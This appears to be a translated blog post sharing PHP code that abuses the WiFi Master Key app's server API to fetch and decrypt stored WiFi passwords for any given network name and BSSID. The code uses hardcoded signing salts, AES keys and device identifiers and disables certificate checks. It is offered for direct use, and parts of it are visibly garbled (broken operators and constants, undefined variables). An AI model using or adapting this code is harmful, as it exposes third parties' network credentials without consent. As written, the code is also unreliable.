Home>

No bullshit,Post the code directly to everyone

<?php //some code from http://www.wooyun.org/bugs/wooyun-2015-099268
$bssid="c8:3a:35:fa:b8:80";
$ssid="podinns2f03";
if (isset ($bssid)&&isset ($ssid)) {
//update salt
   $ret=request ($bssid, $ssid, md5 (rand (1, 10000)));
   $ret=json_decode ($ret);
   $ret=request ($bssid, $ssid, $ret->retsn);
   $ret=json_decode ($ret);
   if ($ret->retcd == 0) {
     if ($ret->qryapwd->retcd == 0) {
       $list=$ret->qryapwd->psws;
       foreach ($list as $wifi) {
         echo "ssid:". $wifi->ssid. "\ n";
         echo "pwd:" .decryptstrin ($wifi-&p;pwd). "\ n";
         echo "bssid:". $wifi->bssid. "\ n";
         if ($wifi->xuser) {
           echo "xuser:". $wifi->xuser. "\ n";
           echo "xpwd:". $wifi->xpwd. "\ n";
         }
       }
     }
     else {
       echo $ret->qryapwd->retmsg;
     }
   }
}
function request ($bssid, $ssid, $salt, $dhid="ff8080814cc5798a014ccbbdfa375369") {
   $data=array ();
   $data ["appid"]="0008";
   $data ["bssid"]=$bssid;
   $data ["chanid"]="gw";
   $data ["dhid"]=$dhid;
   $data ["ii"]="609537f302fc6c32907a935fb4bf7ac9";
   $data ["lang"]="cn";
   $data ["mac"]="60f81dad28de";
   $data ["method"]="getdeepsecchkswitch";
   $data ["pid"]="qryapwd:commonswitch";
   $data ["ssid"]=$ssid;
   $data ["st"]="m";
   $data ["uhid"]="a0000000000000000000000000000001";
   $data ["v"]="324";
   $data ["sign"]=sign ($data, $salt);
   $curl=curl_init ();
   curl_setopt ($curl, curlopt_url, "http://wifiapi02.51y5.net/wifiapi/fa.cmd");
   curl_setopt ($curl, curlopt_useragent, "wifimasterkey/1.1.0 (mac os x version 10.10.3 (build 14d136))");
   curl_setopt ($curl, curlopt_ssl_verifypeer, false);//stop verifying certificate
   curl_setopt ($curl, curlopt_returntransfer, true);
   curl_setopt ($curl, curlopt_post, true);//enable posting
   curl_setopt ($curl, curlopt_postfields, http_build_query ($data));//post images
   curl_setopt ($curl, curlopt_followlocation, true);//if any redirection after upload
   $r=curl_exec ($curl);
   curl_close ($curl);
   return $r;
}
function registernewdevice () {
   $salt="1hf%5yh&7og $1wh! 6vr&7rs! 3nj #1aa $";
   $data=array ();
   $data ["appid"]="0008";
   $data ["bssid"]=$bssid;
   $data ["chanid"]="gw";
   $data ["dhid"]=$dhid;
   $data ["ii"]="609537f302fc6c32907a935fb4bf7ac9";
   $data ["lang"]="cn";
   $data ["mac"]="60f81dad28de";
   $data ["method"]="getdeepsecchkswitch";
   $data ["pid"]="qryapwd:commonswitch";
   $data ["ssid"]=$ssid;
   $data ["st"]="m";
   $data ["uhid"]="a0000000000000000000000000000001";
   $data ["v"]="324";
   $data ["sign"]=sign ($data, $salt);
}
function sign ($array, $salt) {
   //signature algorithm
   $request_str="";
   //corresponds to the arrays.sort array sort in apk,Testing php requires ksort
   ksort ($array);
   foreach ($array as $key =>$value) {
     $request_str.=$value;
   }
   $sign=md5 ($request_str. $salt);
   return strtoupper ($sign);
}
function decryptstrin ($str, $keys="k%7ve #8ie! 5fb&8e", $iv="y! 0oe #2wj #6pw! 3v", $cipher_alg=mcrypt_rijndael_128) {
   //wi-fi master key password is encrypted by aes/cbc/nopadding
   //[length] [password] [timestamp]
   $decrypted_string=mcrypt_decrypt ($cipher_alg, $keys, pack ("h *", $str), mcrypt_mode_cbc, $iv);
   return substr (trim ($decrypted_string), 3, -13);
}?>

Is the above code simple?The wifi master key password query interface code is all written.Hope you like it.

php
  • Previous Winform method for limiting and removing the range of mouse movement
  • Next JS phone number verification method